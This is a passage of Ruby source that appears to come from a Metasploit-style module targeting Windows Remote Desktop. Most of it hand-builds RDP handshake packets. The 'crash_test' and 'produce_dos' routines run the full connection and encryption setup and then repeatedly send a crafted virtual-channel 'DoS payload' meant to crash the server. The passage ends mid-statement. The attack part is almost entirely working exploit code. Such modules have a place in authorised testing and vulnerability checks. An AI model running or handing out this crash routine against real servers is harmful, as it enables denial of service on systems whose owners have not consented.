+\r\n\r\n ## Connect-Initial: UserData\r\n \"\\x04\\x82\\x01\\x51\" + # UserData, length 337 (BER: OctetString)\r\n\r\n ## T.124 GCC Connection Data (ConnectData) - PER Encoding used\r\n \"\\x00\\x05\" + # object length\r\n \"\\x00\\x14\\x7c\\x00\\x01\" + # object: OID 0.0.20.124.0.1 = Generic Conference Control\r\n \"\\x81\\x48\" + # Length: ??? (Connect PDU)\r\n \"\\x00\\x08\\x00\\x10\\x00\\x01\\xc0\\x00\" + # T.124 Connect PDU, Conference name 1\r\n \"\\x44\\x75\\x63\\x61\" + # h221NonStandard: 'Duca' (client-to-server H.221 key)\r\n \"\\x81\\x3a\" + # Length: ??? (T.124 UserData section)\r\n\r\n ## Client MCS Section - 2.2.1.3\r\n \"\\x01\\xc0\" + # clientCoreData (TS_UD_CS_CORE) header - 2.2.1.3.2\r\n \"\\xea\\x00\" + # Length: 234 (includes header)\r\n \"\\x0a\\x00\\x08\\x00\" + # version: 8.1 (RDP 5.0 -> 8.1)\r\n \"\\x80\\x07\" + # desktopWidth: 1920\r\n \"\\x38\\x04\" + # desktopHeigth: 1080\r\n \"\\x01\\xca\" + # colorDepth: 8 bpp\r\n \"\\x03\\xaa\" + # SASSequence: 43523\r\n \"\\x09\\x04\\x00\\x00\" + # keyboardLayout: 1033 (English US)\r\n \"\\xee\\x42\\x00\\x00\" + # clientBuild: ????\r\n [name_unicode].pack(\"a*\") + # clientName\r\n \"\\x04\\x00\\x00\\x00\" + # keyboardType: 4 (IBMEnhanced 101 or 102)\r\n \"\\x00\\x00\\x00\\x00\" + # keyboadSubtype: 0\r\n \"\\x0c\\x00\\x00\\x00\" + # keyboardFunctionKey: 12\r\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" + # imeFileName (64 bytes)\r\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" +\r\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" +\r\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" +\r\n \"\\x01\\xca\" + # postBeta2ColorDepth: 8 bpp\r\n \"\\x01\\x00\" + # clientProductID: 1\r\n \"\\x00\\x00\\x00\\x00\" + # serialNumber: 0\r\n \"\\x18\\x00\" + # highColorDepth: 24 bpp\r\n \"\\x0f\\x00\" + # supportedColorDepths: flag (24 bpp | 16 bpp | 15 bpp)\r\n \"\\xaf\\x07\" + # earlyCapabilityFlags\r\n \"\\x62\\x00\\x63\\x00\\x37\\x00\\x38\\x00\\x65\\x00\\x66\\x00\\x36\\x00\\x33\\x00\" + # clientDigProductID (64 bytes)\r\n \"\\x2d\\x00\\x39\\x00\\x64\\x00\\x33\\x00\\x33\\x00\\x2d\\x00\\x34\\x00\\x31\\x00\" +\r\n \"\\x39\\x38\\x00\\x38\\x00\\x2d\\x00\\x39\\x00\\x32\\x00\\x63\\x00\\x66\\x00\\x2d\" +\r\n \"\\x00\\x00\\x31\\x00\\x62\\x00\\x32\\x00\\x64\\x00\\x61\\x00\\x42\\x42\\x42\\x42\" +\r\n \"\\x07\" + # connectionType: 7\r\n \"\\x00\" + # pad1octet\r\n \r\n ## serverSelectedProtocol - After negotiating TLS or CredSSP this value\r\n ## must match the selectedProtocol value from the server's Negotiate\r\n ## Connection confirm PDU that was sent before encryption was started.\r\n [selected_proto].pack('L<') + # \"\\x01\\x00\\x00\\x00\"\r\n \r\n \"\\x56\\x02\\x00\\x00\" +\r\n \"\\x50\\x01\\x00\\x00\" +\r\n \"\\x00\\x00\" +\r\n \"\\x64\\x00\\x00\\x00\" +\r\n \"\\x64\\x00\\x00\\x00\" +\r\n\r\n \"\\x04\\xc0\" + # clientClusterdata (TS_UD_CS_CLUSTER) header - 2.2.1.3.5\r\n \"\\x0c\\x00\" + # Length: 12 (includes header)\r\n \"\\x15\\x00\\x00\\x00\" + # flags (REDIRECTION_SUPPORTED | REDIRECTION_VERSION3)\r\n \"\\x00\\x00\\x00\\x00\" + # RedirectedSessionID\r\n \"\\x02\\xc0\" + # clientSecuritydata (TS_UD_CS_SEC) header - 2.2.1.3.3\r\n \"\\x0c\\x00\" + # Length: 12 (includes header)\r\n \"\\x1b\\x00\\x00\\x00\" + # encryptionMethods: 3 (40 bit | 128 bit)\r\n \"\\x00\\x00\\x00\\x00\" + # extEncryptionMethods (French locale only)\r\n \"\\x03\\xc0\" + # clientNetworkData (TS_UD_CS_NET) - 2.2.1.3.4\r\n \"\\x38\\x00\" + # Length: 56 (includes header)\r\n channels_defs\r\n\r\n ## Fix. for packet modification.\r\n ## T.125 Connect-Initial\r\n size_1 = [pdu.length - 5].pack(\"s\") # Length (BER: Length)\r\n pdu[3] = size_1[1]\r\n pdu[4] = size_1[0]\r\n\r\n ## Connect-Initial: UserData\r\n size_2 = [pdu.length - 102].pack(\"s\") # UserData, length (BER: OctetString)\r\n pdu[100] = size_2[1]\r\n pdu[101] = size_2[0]\r\n\r\n ## T.124 GCC Connection Data (ConnectData) - PER Encoding used\r\n size_3 = [pdu.length - 111].pack(\"s\") # Length (Connect PDU)\r\n pdu[109] = \"\\x81\"\r\n pdu[110] = size_3[0]\r\n\r\n size_4 = [pdu.length - 125].pack(\"s\") # Length (T.124 UserData section)\r\n pdu[123] = \"\\x81\"\r\n pdu[124] = size_4[0]\r\n\r\n ## Client MCS Section - 2.2.1.3\r\n size_5 = [pdu.length - 383].pack(\"s\") # Length (includes header)\r\n pdu[385] = size_5[0]\r\n\r\n rdp_build_data_tpdu(pdu)\r\n end\r\n\r\n ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/9cde84cd-5055-475a-ac8b-704db419b66f\r\n ## Client Security Exchange PDU - 2.2.1.10\r\n def pdu_security_exchange(rcran, rsexp, rsmod, bitlen)\r\n encrypted_rcran_bignum = rsa_encrypt(rcran, rsexp, rsmod)\r\n encrypted_rcran = int_to_bytestring(encrypted_rcran_bignum)\r\n\r\n bitlen += 8 # Pad with size of TS_SECURITY_PACKET header\r\n\r\n userdata_length = 8 + bitlen\r\n userdata_length_low = userdata_length & 0xFF\r\n userdata_length_high = userdata_length / 256\r\n flags = 0x80 | userdata_length_high\r\n\r\n pdu = \"\\x64\" + # T.125 sendDataRequest\r\n \"\\x00\\x08\" + # intiator userId\r\n \"\\x03\\xeb\" + # channelId = 1003\r\n \"\\x70\" + # dataPriority = high, segmentation = begin | end\r\n [flags].pack(\"C\") +\r\n [userdata_length_low].pack(\"C\") + # UserData length\r\n \r\n # TS_SECURITY_PACKET - 2.2.1.10.1\r\n \"\\x01\\x00\" + # securityHeader flags\r\n \"\\x00\\x00\" + # securityHeader flagsHi\r\n [bitlen].pack(\"L<\") + # TS_ length\r\n encrypted_rcran + # encryptedClientRandom - 64 bytes\r\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" # 8 bytes rear padding (always present)\r\n\r\n return(rdp_build_data_tpdu(pdu))\r\n end\r\n\r\n ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/04c60697-0d9a-4afd-a0cd-2cc133151a9c\r\n ## Client MCS Erect Domain Request PDU - 2.2.1.5\r\n def pdu_erect_domain_request()\r\n pdu = \"\\x04\" + # T.125 ErectDomainRequest\r\n \"\\x01\\x00\" + # subHeight - length 1, value 0\r\n \"\\x01\\x00\" # subInterval - length 1, value 0\r\n\r\n return(rdp_build_data_tpdu(pdu))\r\n end\r\n\r\n ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/f5d6a541-9b36-4100-b78f-18710f39f247\\\r\n ## Client MCS Attach User Request PDU - 2.2.1.6\r\n def pdu_attach_user_request()\r\n pdu = \"\\x28\" # T.125 AttachUserRequest\r\n\r\n return(rdp_build_data_tpdu(pdu))\r\n end\r\n\r\n ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/64564639-3b2d-4d2c-ae77-1105b4cc011b\r\n ## Client MCS Channel Join Request PDU -2.2.1.8\r\n def pdu_channel_request(user1, channel_id)\r\n pdu = \"\\x38\" + [user1, channel_id].pack(\"nn\") # T.125 ChannelJoinRequest\r\n\r\n return(rdp_build_data_tpdu(pdu))\r\n end\r\n\r\n ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/772d618e-b7d6-4cd0-b735-fa08af558f9d\r\n ## TS_INFO_PACKET - 2.2.1.11.1.1\r\n def pdu_client_info(user_name, domain_name = \"\", ip_address = \"\")\r\n ## Max. len for 4.0/6.0 servers is 44 bytes including terminator.\r\n ## Max. len for all other versions is 512 including terminator.\r\n ## We're going to limit to 44 (21 chars + null -> unicode) here.\r\n \r\n ## Blank username is valid, nil = random.\r\n user_name = Rex::Text.rand_text_alpha(10) if user_name.nil?\r\n user_unicode = Rex::Text.to_unicode(user_name[0..20], type = 'utf-16le')\r\n uname_len = user_unicode.length\r\n\r\n ## Domain can can be, and for rdesktop typically is, empty.\r\n ## Max. len for 4.0/5.0 servers is 52 including terminator.\r\n ## Max. len for all other versions is 512 including terminator.\r\n ## We're going to limit to 52 (25 chars + null -> unicode) here.\r\n domain_unicode = Rex::Text.to_unicode(domain_name[0..24], type = 'utf-16le')\r\n domain_len = domain_unicode.length\r\n\r\n ## This address value is primarily used to reduce the fields by which this\r\n ## module can be fingerprinted. It doesn't show up in Windows logs.\r\n ## clientAddress + null terminator\r\n ip_unicode = Rex::Text.to_unicode(ip_address, type = 'utf-16le') + \"\\x00\\x00\"\r\n ip_len = ip_unicode.length\r\n \r\n pdu = \"\\xa1\\xa5\\x09\\x04\" +\r\n \"\\x09\\x04\\xbb\\x47\" + # CodePage\r\n \"\\x03\\x00\\x00\\x00\" + # flags - INFO_MOUSE, INFO_DISABLECTRLALTDEL, INFO_UNICODE, INFO_MAXIMIZESHELL, INFO_ENABLEWINDOWSKEY\r\n [domain_len].pack(\"S<\") + # cbDomain (length value) - EXCLUDES null terminator\r\n [uname_len].pack(\"S<\") + # cbUserName (length value) - EXCLUDES null terminator\r\n \"\\x00\\x00\" + # cbPassword (length value)\r\n \"\\x00\\x00\" + # cbAlternateShell (length value)\r\n \"\\x00\\x00\" + # cbWorkingDir (length value)\r\n [domain_unicode].pack(\"a*\") + # Domain\r\n \"\\x00\\x00\" + # Domain null terminator, EXCLUDED from value of cbDomain\r\n [user_unicode].pack(\"a*\") + # UserName\r\n \"\\x00\\x00\" + # UserName null terminator, EXCLUDED FROM value of cbUserName\r\n \"\\x00\\x00\" + # Password - empty\r\n \"\\x00\\x00\" + # AlternateShell - empty\r\n\r\n ## TS_EXTENDED_INFO_PACKET - 2.2.1.11.1.1.1\r\n \"\\x02\\x00\" + # clientAddressFamily - AF_INET - FIXFIX - detect and set dynamically\r\n [ip_len].pack(\"S<\") + # cbClientAddress (length value) - INCLUDES terminator ... for reasons.\r\n [ip_unicode].pack(\"a*\") + # clientAddress (unicode + null terminator (unicode)\r\n\r\n \"\\x3c\\x00\" + # cbClientDir (length value): 60\r\n \"\\x43\\x00\\x3a\\x00\\x5c\\x00\\x57\\x00\\x49\\x00\\x4e\\x00\\x4e\\x00\\x54\\x00\" + # clientDir - 'C:\\WINNT\\System32\\mstscax.dll' + null terminator\r\n \"\\x5c\\x00\\x53\\x00\\x79\\x00\\x73\\x00\\x74\\x00\\x65\\x00\\x6d\\x00\\x33\\x00\" +\r\n \"\\x32\\x00\\x5c\\x00\\x6d\\x00\\x73\\x00\\x74\\x00\\x73\\x00\\x63\\x00\\x61\\x00\" +\r\n \"\\x78\\x00\\x2e\\x00\\x64\\x00\\x6c\\x00\\x6c\\x00\\x00\\x00\" +\r\n \r\n ## clientTimeZone - TS_TIME_ZONE struct - 172 bytes\r\n ## These are the default values for rdesktop\r\n \"\\xa4\\x01\\x00\\x00\" + # Bias\r\n\r\n ## StandardName - 'GTB,normaltid'\r\n \"\\x4d\\x00\\x6f\\x00\\x75\\x00\\x6e\\x00\\x74\\x00\\x61\\x00\\x69\\x00\\x6e\\x00\" +\r\n \"\\x20\\x00\\x53\\x00\\x74\\x00\\x61\\x00\\x6e\\x00\\x64\\x00\\x61\\x00\\x72\\x00\" +\r\n \"\\x64\\x00\\x20\\x00\\x54\\x00\\x69\\x00\\x6d\\x00\\x65\\x00\\x00\\x00\\x00\\x00\" +\r\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" +\r\n \"\\x00\\x00\\x0b\\x00\\x00\\x00\\x01\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" + # StandardDate\r\n \"\\x00\\x00\\x00\\x00\" + # StandardBias\r\n\r\n ## DaylightName - 'GTB,sommartid'\r\n \"\\x4d\\x00\\x6f\\x00\\x75\\x00\\x6e\\x00\\x74\\x00\\x61\\x00\\x69\\x00\\x6e\\x00\" +\r\n \"\\x20\\x00\\x44\\x00\\x61\\x00\\x79\\x00\\x6c\\x00\\x69\\x00\\x67\\x00\\x68\\x00\" +\r\n \"\\x74\\x00\\x20\\x00\\x54\\x00\\x69\\x00\\x6d\\x00\\x65\\x00\\x00\\x00\\x00\\x00\" +\r\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" +\r\n \"\\x00\\x00\\x03\\x00\\x00\\x00\\x02\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" + # DaylightDate\r\n \"\\xc4\\xff\\xff\\xff\" + # DaylightBias\r\n\r\n \"\\x01\\x00\\x00\\x00\" + # clientSessionId\r\n \"\\x06\\x00\\x00\\x00\" + # performanceFlags\r\n \"\\x00\\x00\" + # cbAutoReconnectCookie\r\n \"\\x64\\x00\\x00\\x00\"\r\n\r\n return(pdu)\r\n end\r\n\r\n # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/4e9722c3-ad83-43f5-af5a-529f73d88b48\r\n # Confirm Active PDU Data - TS_CONFIRM_ACTIVE_PDU - 2.2.1.13.2.1\r\n def pdu_client_confirm_active()\r\n pdu = \"\\xea\\x03\\x01\\x00\" + # shareId: 66538\r\n \"\\xea\\x03\" + # originatorId\r\n \"\\x06\\x00\" + # lengthSourceDescriptor: 6\r\n \"\\x3e\\x02\" + # lengthCombinedCapabilities: ???\r\n \"\\x4d\\x53\\x54\\x53\\x43\\x00\" + # SourceDescriptor: 'MSTSC'\r\n \"\\x17\\x00\" + # numberCapabilities: 23\r\n \"\\x00\\x00\" + # pad2Octets\r\n \"\\x01\\x00\" + # capabilitySetType: 1 - TS_GENERAL_CAPABILITYSET\r\n \"\\x18\\x00\" + # lengthCapability: 24\r\n \"\\x01\\x00\\x03\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x1d\\x04\\x00\\x00\\x00\\x00\" +\r\n \"\\x00\\x00\\x00\\x00\" +\r\n \"\\x02\\x00\" + # capabilitySetType: 2 - TS_BITMAP_CAPABILITYSET\r\n \"\\x1c\\x00\" + # lengthCapability: 28\r\n \"\\x20\\x00\\x01\\x00\\x01\\x00\\x01\\x00\\x80\\x07\\x38\\x04\\x00\\x00\\x01\\x00\" +\r\n \"\\x01\\x00\\x00\\x1a\\x01\\x00\\x00\\x00\" +\r\n \"\\x03\\x00\" + # capabilitySetType: 3 - TS_ORDER_CAPABILITYSET\r\n \"\\x58\\x00\" + # lengthCapability: 88\r\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" +\r\n \"\\x00\\x00\\x00\\x00\\x01\\x00\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\xaa\\x00\" +\r\n \"\\x01\\x01\\x01\\x01\\x01\\x00\\x00\\x01\\x01\\x01\\x00\\x01\\x00\\x00\\x00\\x01\" +\r\n \"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x00\\x01\\x01\\x01\\x00\\x00\\x00\\x00\\x00\" +\r\n \"\\xa1\\x06\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x84\\x03\\x00\\x00\\x00\\x00\\x00\" +\r\n \"\\xe4\\x04\\x00\\x00\\x13\\x00\\x28\\x00\\x03\\x00\\x00\\x03\\x78\\x00\\x00\\x00\" +\r\n \"\\x78\\x00\\x00\\x00\\xfc\\x09\\x00\\x80\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" +\r\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" +\r\n \"\\x0a\\x00\" + # capabilitySetType: 10 - ??\r\n \"\\x08\\x00\" + # lengthCapability: 8\r\n \"\\x06\\x00\\x00\\x00\" +\r\n \"\\x07\\x00\" + # capabilitySetType: 7 - TSWINDOWACTIVATION_CAPABILITYSET\r\n \"\\x0c\\x00\" + # lengthCapability: 12\r\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" +\r\n \"\\x05\\x00\" + # capabilitySetType: 5 - TS_CONTROL_CAPABILITYSET\r\n \"\\x0c\\x00\" + # lengthCapability: 12\r\n \"\\x00\\x00\\x00\\x00\\x02\\x00\\x02\\x00\" +\r\n \"\\x08\\x00\" + # capabilitySetType: 8 - TS_POINTER_CAPABILITYSET\r\n \"\\x0a\\x00\" + # lengthCapability: 10\r\n \"\\x01\\x00\\x14\\x00\\x15\\x00\" +\r\n \"\\x09\\x00\" + # capabilitySetType: 9 - TS_SHARE_CAPABILITYSET\r\n \"\\x08\\x00\" + # lengthCapability: 8\r\n \"\\x00\\x00\\x00\\x00\" +\r\n \"\\x0d\\x00\" + # capabilitySetType: 13 - TS_INPUT_CAPABILITYSET\r\n \"\\x58\\x00\" + # lengthCapability: 88\r\n \"\\x91\\x00\\x20\\x00\\x09\\x04\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" +\r\n \"\\x0c\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" +\r\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" +\r\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" +\r\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" +\r\n \"\\x00\\x00\\x00\\x00\" +\r\n \"\\x0c\\x00\" + # capabilitySetType: 12 - TS_SOUND_CAPABILITYSET\r\n \"\\x08\\x00\" + # lengthCapability: 8\r\n \"\\x01\\x00\\x00\\x00\" +\r\n \"\\x0e\\x00\" + # capabilitySetType: 14 - TS_FONT_CAPABILITYSET\r\n \"\\x08\\x00\" + # lengthCapability: 8\r\n \"\\x01\\x00\\x00\\x00\" +\r\n \"\\x10\\x00\" + # capabilitySetType: 16 - TS_GLYPHCAChE_CAPABILITYSET\r\n \"\\x34\\x00\" + # lengthCapability: 52\r\n \"\\xfe\\x00\\x04\\x00\\xfe\\x00\\x04\\x00\\xfe\\x00\\x08\\x00\\xfe\\x00\\x08\\x00\" +\r\n \"\\xfe\\x00\\x10\\x00\\xfe\\x00\\x20\\x00\\xfe\\x00\\x40\\x00\\xfe\\x00\\x80\\x00\" +\r\n \"\\xfe\\x00\\x00\\x01\\x40\\x00\\x00\\x08\\x00\\x01\\x00\\x01\\x03\\x00\\x00\\x00\" +\r\n \"\\x0f\\x00\" + # capabilitySetType: 15 - TS_BRUSH_CAPABILITYSET\r\n \"\\x08\\x00\" + # lengthCapability: 8\r\n \"\\x01\\x00\\x00\\x00\" +\r\n \"\\x11\\x00\" + # capabilitySetType: ??\r\n \"\\x0c\\x00\" + # lengthCapability: 12\r\n \"\\x01\\x00\\x00\\x00\\x00\\x28\\x64\\x00\" +\r\n \"\\x14\\x00\" + # capabilitySetType: ??\r\n \"\\x0c\\x00\" + # lengthCapability: 12\r\n \"\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" +\r\n \"\\x15\\x00\" + # capabilitySetType: ??\r\n \"\\x0c\\x00\" + # lengthCapability: 12\r\n \"\\x02\\x00\\x00\\x00\\x00\\x0a\\x00\\x01\" +\r\n \"\\x1a\\x00\" + # capabilitySetType: ??\r\n \"\\x08\\x00\" + # lengthCapability: 8\r\n \"\\xaf\\x94\\x00\\x00\" +\r\n \"\\x1c\\x00\" + # capabilitySetType: ??\r\n \"\\x0c\\x00\" + # lengthCapability: 12\r\n \"\\x12\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" +\r\n \"\\x1b\\x00\" + # capabilitySetType: ??\r\n \"\\x06\\x00\" + # lengthCapability: 6\r\n \"\\x01\\x00\" +\r\n \"\\x1e\\x00\" + # capabilitySetType: ??\r\n \"\\x08\\x00\" + # lengthCapability: 8\r\n \"\\x01\\x00\\x00\\x00\" +\r\n \"\\x18\\x00\" + # capabilitySetType: ??\r\n \"\\x0b\\x00\" + # lengthCapability: 11\r\n \"\\x02\\x00\\x00\\x00\\x03\\x0c\\x00\" +\r\n \"\\x1d\\x00\" + # capabilitySetType: ??\r\n \"\\x5f\\x00\" + # lengthCapability: 95\r\n \"\\x02\\xb9\\x1b\\x8d\\xca\\x0f\\x00\\x4f\\x15\\x58\\x9f\\xae\\x2d\\x1a\\x87\\xe2\" +\r\n \"\\xd6\\x01\\x03\\x00\\x01\\x01\\x03\\xd4\\xcc\\x44\\x27\\x8a\\x9d\\x74\\x4e\\x80\" +\r\n \"\\x3c\\x0e\\xcb\\xee\\xa1\\x9c\\x54\\x05\\x31\\x00\\x31\\x00\\x00\\x00\\x01\\x00\" +\r\n \"\\x00\\x00\\x25\\x00\\x00\\x00\\xc0\\xcb\\x08\\x00\\x00\\x00\\x01\\x00\\xc1\\xcb\" +\r\n \"\\x1d\\x00\\x00\\x00\\x01\\xc0\\xcf\\x02\\x00\\x08\\x00\\x00\\x01\\x40\\x00\\x02\" +\r\n \"\\x01\\x01\\x01\\x00\\x01\\x40\\x00\\x02\\x01\\x01\\x04\"\r\n\r\n ## type = 0x13 = TS_PROTOCOL_VERSION | PDUTYPE_CONFIRMACTIVEPDU\r\n return(rdp_build_share_control_header(0x13, pdu))\r\n end\r\n\r\n ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/5186005a-36f5-4f5d-8c06-968f28e2d992\r\n ## Client Synchronize - TS_SYNCHRONIZE_PDU - 2.2.1.19 / 2.2.14.1\r\n def pdu_client_synchronize(target_user = 0) \r\n pdu = \"\\x01\\x00\" + # messageType: 1 SYNCMSGTYPE_SYNC\r\n [target_user].pack(\"S<\") # targetUser, 16 bit, unsigned.\r\n\r\n ## pduType2 = 0x1f = 31 - PDUTYPE2_SCYNCHRONIZE\r\n data_header = rdp_build_share_data_header(0x1f, pdu)\r\n\r\n ## type = 0x17 = TS_PROTOCOL_VERSION | PDUTYPE_DATAPDU\r\n return(rdp_build_share_control_header(0x17, data_header))\r\n end\r\n\r\n ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/9d1e1e21-d8b4-4bfd-9caf-4b72ee91a7135\r\n ## Control Cooperate - TC_CONTROL_PDU 2.2.1.15\r\n def pdu_client_control_cooperate()\r\n pdu = \"\\x04\\x00\" + # action: 4 - CTRLACTION_COOPERATE\r\n \"\\x00\\x00\" + # grantId: 0\r\n \"\\x00\\x00\\x00\\x00\" # controlId: 0\r\n\r\n ## pduType2 = 0x14 = 20 - PDUTYPE2_CONTROL\r\n data_header = rdp_build_share_data_header(0x14, pdu)\r\n\r\n ## type = 0x17 = TS_PROTOCOL_VERSION | PDUTYPE_DATAPDU\r\n return(rdp_build_share_control_header(0x17, data_header))\r\n end\r\n\r\n\r\n ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/4f94e123-970b-4242-8cf6-39820d8e3d35\r\n ## Control Request - TC_CONTROL_PDU 2.2.1.16\r\n def pdu_client_control_request()\r\n\r\n pdu = \"\\x01\\x00\" + # action: 1 - CTRLACTION_REQUEST_CONTROL\r\n \"\\x00\\x00\" + # grantId: 0\r\n \"\\x00\\x00\\x00\\x00\" # controlId: 0\r\n\r\n ## pduType2 = 0x14 = 20 - PDUTYPE2_CONTROL\r\n data_header = rdp_build_share_data_header(0x14, pdu)\r\n\r\n ## type = 0x17 = TS_PROTOCOL_VERSION | PDUTYPE_DATAPDU\r\n return(rdp_build_share_control_header(0x17, data_header))\r\n end\r\n\r\n ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/ff7f06f8-0dcf-4c8d-be1f-596ae60c4396\r\n ## Client Input Event Data - TS_INPUT_PDU_DATA - 2.2.8.1.1.3.1\r\n def pdu_client_input_event_sychronize()\r\n pdu = \"\\x01\\x00\" + # numEvents: 1\r\n \"\\x00\\x00\" + # pad2Octets\r\n \"\\x00\\x00\\x00\\x00\" + # eventTime\r\n \"\\x00\\x00\" + # messageType: 0 - INPUT_EVENT_SYNC\r\n \r\n ## TS_SYNC_EVENT 202.8.1.1.3.1.1.5\r\n \"\\x00\\x00\" + # pad2Octets\r\n \"\\x00\\x00\\x00\\x00\" # toggleFlags\r\n\r\n ## pduType2 = 0x1c = 28 - PDUTYPE2_INPUT\r\n data_header = rdp_build_share_data_header(0x1c, pdu)\r\n\r\n ## type = 0x17 = TS_PROTOCOL_VERSION | PDUTYPE_DATAPDU\r\n return(rdp_build_share_control_header(0x17, data_header))\r\n end\r\n\r\n ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/7067da0d-e318-4464-88e8-b11509cf0bd9\r\n ## Client Font List - TS_FONT_LIST_PDU - 2.2.1.18\r\n def pdu_client_font_list()\r\n pdu = \"\\x00\\x00\" + # numberFonts: 0\r\n \"\\x00\\x00\" + # totalNumberFonts: 0\r\n \"\\x03\\x00\" + # listFlags: 3 (FONTLIST_FIRST | FONTLIST_LAST)\r\n \"\\x32\\x00\" # entrySize: 50\r\n\r\n ## pduType2 = 0x27 = 29 - PDUTYPE2_FONTLIST\r\n data_header = rdp_build_share_data_header(0x27, pdu)\r\n\r\n ## type = 0x17 = TS_PROTOCOL_VERSION | PDUTYPE_DATAPDU\r\n return(rdp_build_share_control_header(0x17, data_header))\r\n end\r\n\r\n # ------------------------------------------------------------------------- #\r\n\r\n def crash_test(rc4enckey, hmackey)\r\n begin\r\n received = \"\"\r\n for i in 0..5\r\n received += rdp_recv()\r\n end\r\n rescue RdpCommunicationError\r\n # we don't care\r\n end\r\n\r\n vprint_status(\"Sending DoS payload\")\r\n found = false\r\n for j in 0..15\r\n ## x86_payload:\r\n rdp_send(rdp_build_pkt(rdp_build_virtual_channel_pdu(0x03, [\"00000000020000000000000\"].pack(\"H*\")), rc4enckey, hmackey, \"\\x03\\xef\"))\r\n\r\n ## x64_payload:\r\n rdp_send(rdp_build_pkt(rdp_build_virtual_channel_pdu(0x03, [\"00000000000000000200000\"].pack(\"H*\")), rc4enckey, hmackey, \"\\x03\\xef\"))\r\n end\r\n end\r\n\r\n def produce_dos()\r\n \r\n unless(rdp_connection_initiation())\r\n vprint_status(\"Could not connect to RDP.\")\r\n return(false)\r\n end\r\n \r\n vprint_status(\"Sending initial client data\")\r\n received = rdp_sendrecv(pdu_connect_initial(RDPConstants::PROTOCOL_RDP, datastore['RDP_CLIENT_NAME']))\r\n\r\n rsmod, rsexp, rsran, server_rand, bitlen = rdp_parse_connect_response(received)\r\n\r\n vprint_status(\"Sending erect domain request\")\r\n rdp_send(pdu_erect_domain_request())\r\n\r\n vprint_status(\"Sending attach user request\")\r\n received = rdp_sendrecv(pdu_attach_user_request())\r\n\r\n user1 = received[9, 2].unpack(\"n\").first\r\n\r\n [1003, 1004, 1005, 1006, 1007].each do | chan |\r\n rdp_sendrecv(pdu_channel_request(user1, chan))\r\n end\r\n\r\n ## 5.3.4 Client Random Value\r\n client_rand = ''\r\n 32.times { client_rand << rand(0..255) }\r\n rcran = bytes_to_bignum(client_rand)\r\n\r\n vprint_status(\"Sending security exchange PDU\")\r\n rdp_send(pdu_security_exchange(rcran, rsexp, rsmod, bitlen))\r\n\r\n ## We aren't decrypting anything at this point. Leave the variables here\r\n ## to make it easier to understand in the future.\r\n rc4encstart, rc4decstart, hmackey, sessblob = rdp_calculate_rc4_keys(client_rand, server_rand)\r\n\r\n vprint_status(\"RC4_ENC_KEY: #{bin_to_hex(rc4encstart)}\")\r\n vprint_status(\"RC4_DEC_KEY: #{bin_to_hex(rc4decstart)}\")\r\n vprint_status(\"HMAC_KEY: #{bin_to_hex(hmackey)}\")\r\n vprint_status(\"SESS_BLOB: #{bin_to_hex(sessblob)}\")\r\n\r\n rc4enckey = RC4.new(rc4encstart)\r\n\r\n vprint_status(\"Sending client info PDU\") # TODO\r\n pdu = pdu_client_info(datastore['RDP_USER'], datastore['RDP_DOMAIN'], datastore['RDP_CLIENT_IP'])\r\n received = rdp_sendrecv(rdp_build_pkt(pdu, rc4enckey, hmackey, \"\\x03\\xeb\", true))\r\n\r\n vprint_status(\"Received License packet\")\r\n rdp_recv()\r\n\r\n vprint_status(\"Sending client confirm active PDU\")\r\n rdp_send(rdp_build_pkt(pdu_client_confirm_active(), rc4enckey, hmackey))\r\n\r\n vprint_status(\"Sending client synchronize PDU\")\r\n rdp_send(rdp_build_pkt(pdu_client_synchronize(1009), rc4enckey, 